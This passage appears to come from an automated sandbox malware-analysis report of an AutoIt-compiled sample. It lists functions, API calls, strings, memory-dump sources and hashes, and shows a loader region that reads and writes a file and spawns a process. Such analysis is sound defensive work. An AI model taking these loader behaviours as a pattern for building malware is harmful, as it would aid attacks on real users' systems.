cea15d-cea16a 1032->1034 1035 cea16c-cea173 1034->1035 1036 cea1b3-cea1ba 1034->1036 1037 cea175-cea185 1035->1037 1038 cea1a1-cea1a5 1035->1038 1036->1028 1036->1034 1037->1036 1041 cea187-cea18f 1037->1041 1039 cea1ab 1038->1039 1040 cea1a7-cea1a9 1038->1040 1042 cea1ad-cea1ae call cd7804 1039->1042 1040->1042 1041->1038 1043 cea191-cea197 1041->1043 1042->1036 1043->1038 1045 cea199-cea19f 1043->1045 1045->1036 1045->1038
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 1cfaf3662d1849b3c269836db9c9c6c6c2d9beb4d4dc477eb35583409d970ed6
                    • Instruction ID: 94b777a3bcde19e85be4f3b854acf56e6f975bf6975c8e8e5e3e71a1c0d9ed4f
                    • Opcode Fuzzy Hash: 1cfaf3662d1849b3c269836db9c9c6c6c2d9beb4d4dc477eb35583409d970ed6
                    • Instruction Fuzzy Hash: FDC19F71A0025A9FDF10CFAAC885BAEB7B5FF48314F148469E915EB280E770AE45CB51
                    Function 03140920 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1114 3140920-3140972 call 3140820 CreateFileW 1117 3140974-3140976 1114->1117 1118 314097b-3140988 1114->1118 1119 3140ad4-3140ad8 1117->1119 1121 314098a-3140996 1118->1121 1122 314099b-31409b2 VirtualAlloc 1118->1122 1121->1119 1123 31409b4-31409b6 1122->1123 1124 31409bb-31409e1 CreateFileW 1122->1124 1123->1119 1126 3140a05-3140a1f ReadFile 1124->1126 1127 31409e3-3140a00 1124->1127 1128 3140a21-3140a3e 1126->1128 1129 3140a43-3140a47 1126->1129 1127->1119 1128->1119 1130 3140a68-3140a7f WriteFile 1129->1130 1131 3140a49-3140a66 1129->1131 1133 3140a81-3140aa8 1130->1133 1134 3140aaa-3140acf FindCloseChangeNotification VirtualFree 1130->1134 1131->1119 1133->1119 1134->1119
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03140965
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction ID: 5f84f2acf5c1d7864bc1c61ae1417c0c02583a4e2260b5f332257ee8e2d05eb5
                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction Fuzzy Hash: 2951F675A50208FBEF24DFA5CC49FEEB7B9AF4C700F208554F64AEA180DB7496458B60
                    Function 00C739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1144 c739e7-c73a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C73A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00C73A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00C73A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: cfd4a91888ca35d1faec2bdef8b6de3fa4f5f05a43fe165c9be6ea3941400eea
                    • Instruction ID: 652d77e350e9cf0a62eeb1a0a15cf815b6e3974d28f26aa92b65a3b98a318582
                    • Opcode Fuzzy Hash: cfd4a91888ca35d1faec2bdef8b6de3fa4f5f05a43fe165c9be6ea3941400eea
                    • Instruction Fuzzy Hash: 05F03A746003947EEA701727AC08F7B3E7DDBC7F50B02802EBA00E2270CAA55811DAB5
                    Function 00C7410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1145 c7410d-c74123 1146 c74200-c74204 1145->1146 1147 c74129-c7413e call c77b76 1145->1147 1150 c74144-c74164 call c77d2c 1147->1150 1151 cad5dd-cad5ec LoadStringW 1147->1151 1154 cad5f7-cad60f call c77c8e call c77143 1150->1154 1155 c7416a-c7416e 1150->1155 1151->1154 1164 c7417e-c741fb call c93020 call c7463e call c92ffc Shell_NotifyIconW call c75a64 1154->1164 1166 cad615-cad633 call c77e0b call c77143 call c77e0b 1154->1166 1157 c74205-c7420e call c781a7 1155->1157 1158 c74174-c74179 call c77c8e 1155->1158 1157->1164 1158->1164 1164->1146 1166->1164
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CAD5EC
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • _memset.LIBCMT ref: 00C7418D
                    • _wcscpy.LIBCMT ref: 00C741E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C741F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 2c55c01869e686b05001a8c9060c3ae8a0a41c70b73f7bfe6f9c21c49838eda5
                    • Instruction ID: b35b59015bcd02587eef21b9ba169aea528d43cd548ff3a690aa138cd24a7e65
                    • Opcode Fuzzy Hash: 2c55c01869e686b05001a8c9060c3ae8a0a41c70b73f7bfe6f9c21c49838eda5
                    • Instruction Fuzzy Hash: A731D171408318AFD725EB60DC46BEF77E8AF44300F10C61EF199921A1EB74A648D7A7
                    Function 00C9564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 348404629486ce957af025398ea6d2d156c52602c58be2e0c5c62175a0000313
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: F551A030A10B05DFDF268FB9C88866EB7B5AF41320F648769F835962D0D7719F519B40
                    Function 00C769CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74F6F
                    • _free.LIBCMT ref: 00CAE68C
                    • _free.LIBCMT ref: 00CAE6D3
                      • Part of subcall function 00C76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C76D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 4191987339c9ae8b04bd908825a59cf3c26c7a2c0f902c497b3371cd96824d05
                    • Instruction ID: f2406ccf1c98cf0e6c1eb420eeb536e3f88133472d1d1c98571baa2b1eb59947
                    • Opcode Fuzzy Hash: 4191987339c9ae8b04bd908825a59cf3c26c7a2c0f902c497b3371cd96824d05
                    • Instruction Fuzzy Hash: 5F91707191021AEFCF04EFA4CC919EDB7B4FF19314F14856AF815AB291EB309A05DBA0
                    Function 031423B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 031422A0: Sleep.KERNELBASE(000001F4), ref: 031422B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 031424FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: NE75JB4M9EWG69JLI1A96IVQ8
                    • API String ID: 2694422964-3911713287
                    • Opcode ID: bbdb60a202c4c42b7c660eda079f274f5ba94c0617fa5ad5a2b5f1dd0ee09130
                    • Instruction ID: 9f05a580a0f7e66e7d7c693f0ae673e2847b183f7d35a1201a235a44572918d6
                    • Opcode Fuzzy Hash: bbdb60a202c4c42b7c660eda079f274f5ba94c0617fa5ad5a2b5f1dd0ee09130
                    • Instruction Fuzzy Hash: E9618230D04288DBEF11DBA4D814BEEBB78AF19304F044599E6487B2C1D7B91B8ACB65
                    Function 00CCDA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CCDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CCDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CCDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressProc
                    • String ID: DllGetClassObject
                    • API String ID: 1548245697-1075368562
                    • Opcode ID: 6475efb4c079ce2a9c59c7efa319f379d358234ff32843eb8e6181b0d48a4fdd
                    • Instruction ID: 497e93e9fded3a8b6e18544dd1eee11b611ee82cf88564f01e33c55289776b96
                    • Opcode Fuzzy Hash: 6475efb4c079ce2a9c59c7efa319f379d358234ff32843eb8e6181b0d48a4fdd
                    • Instruction Fuzzy Hash: B1414CB1600208EFDB15CF55C898FAABBB9EF44350F1580AEE9069F245D7B1DE44DBA0
                    Function 00C735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C735A1,SwapMouseButtons,00000004,?), ref: 00C735D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C735A1,SwapMouseButtons,00000004,?,?,?,?,00C72754), ref: 00C735F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00C735A1,SwapMouseButtons,00000004,?,?,?,?,00C72754), ref: 00C73617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: ec6090c10f0d84a5e89ea4dbd658f741e0843a6541a3d5cfee9b9ba06b399b3c
                    • Instruction ID: 0d89d9ddb4cfba0e038b402f4a6f95fe37176f824459c1840c379c50f559c6c9
                    • Opcode Fuzzy Hash: ec6090c10f0d84a5e89ea4dbd658f741e0843a6541a3d5cfee9b9ba06b399b3c
                    • Instruction Fuzzy Hash: 03113371611258BBDB208F64D880AEEBBA8EF04740F118469B809D7210E6719F41ABA4
                    Function 00CC76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eaafd6bed695371e08c2d474aad4914c528258768f7b5acefeac003b491253e4
                    • Instruction ID: de75bfb652422c991e1e5e4ce8b2dcfda32e0d9257b669c0950987dacff2ee1a
                    • Opcode Fuzzy Hash: eaafd6bed695371e08c2d474aad4914c528258768f7b5acefeac003b491253e4
                    • Instruction Fuzzy Hash: 14C13974A04216EFCB15CF95C888EAEBBB5FF48714B11869CE816EB251D730DE81DB90
                    Function 00C9493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: d4fdb90e489f344a1e4bd8aa745b43cd6eb3fc2efc2fdbb5f22475e078afced6
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: 1741D871A007069BDF2CCEA9C888D6F77AAEF84360B24817DE865C7640EB70DE439744
                    Function 00C773E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CAEE62
                    • 7516D0D0.COMDLG32(?), ref: 00CAEEAC
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                      • Part of subcall function 00C909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C909F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NamePath$7516FullLong_memset
                    • String ID: X
                    • API String ID: 3926756254-3081909835
                    • Opcode ID: 5528f983ac7b612cf414908b35ba528c94a496ff889c91fb24e3237cbc096a7e
                    • Instruction ID: 8bbc3af128404d05d6808550aac2bf691f3a4e21290ceb80f8485a03e2c5743a
                    • Opcode Fuzzy Hash: 5528f983ac7b612cf414908b35ba528c94a496ff889c91fb24e3237cbc096a7e
                    • Instruction Fuzzy Hash: DA21A871A0029C9BCF51DF94D845BEE7BF89F49314F04805AE508E7381DBB45949DFA1
                    Function 00CD901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 11fffe1e386489e9bf60676a519baae0cbeffdc22f166f072b389155102b39e0
                    • Instruction ID: 74c04a996402e61a398cdb855c9b4e75d112f4d4587d6ff80ca20365e0b4986a
                    • Opcode Fuzzy Hash: 11fffe1e386489e9bf60676a519baae0cbeffdc22f166f072b389155102b39e0
                    • Instruction Fuzzy Hash: D701F9718042186EDF29C6A8D81AEEE7BFCDB15301F00419FF552D2181E575E7089760
                    Function 00C90FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C9594C: __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9594C: __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9594C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    • std::exception::exception.LIBCMT ref: 00C9102C
                    • __CxxThrowException@8.LIBCMT ref: 00C91041
                      • Part of subcall function 00C987DB: RaiseException.KERNEL32(?,?,00000000,00D2BAF8,?,00000001,?,?,?,00C91046,00000000,00D2BAF8,00C79FEC,00000001), ref: 00C98830
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID: bad allocation
                    • API String ID: 3902256705-2104205924
                    • Opcode ID: 2adaa9b058b56bcbc8ae38e33369de333889a3e5861338931c2c7abe6a87b758
                    • Instruction ID: 85a473414d6069a823af384489ecd91865e57663ed883cb02410ac648cf92ea1
                    • Opcode Fuzzy Hash: 2adaa9b058b56bcbc8ae38e33369de333889a3e5861338931c2c7abe6a87b758
                    • Instruction Fuzzy Hash: BEF0A935500259A6CF21AA94EC0EAEF77A89F01350F140415FC1896691DFB29F84A2F0
                    Function 03141000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03141045
                    • ExitProcess.KERNEL32(00000000), ref: 03141064
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CreateExit
                    • String ID: D
                    • API String ID: 126409537-2746444292
                    • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                    • Instruction ID: b28b7105b36fee787606da88d932688b5a454d8cb123a093e83bbf308545b2c1
                    • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                    • Instruction Fuzzy Hash: BEF0EC7554024CABDB60DFE0CD49FEE777CBF08701F148918BB0A9A184DB7896488B61
                    Function 00CD9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00CD9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CD9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: d4e149b053aeb13a1fa6c9cc0682b6f90b41368db02950c855dec2297dd95ff9
                    • Instruction ID: f75a0f04c7253e5094dc5dfe709d56dc985904ae7e45f464925bc470f75fa302
                    • Opcode Fuzzy Hash: d4e149b053aeb13a1fa6c9cc0682b6f90b41368db02950c855dec2297dd95ff9
                    • Instruction Fuzzy Hash: E8D05B7554030D6BDB109B94DC0DFAA772CEB04704F0041A1BE54D1191DDB05599CB92
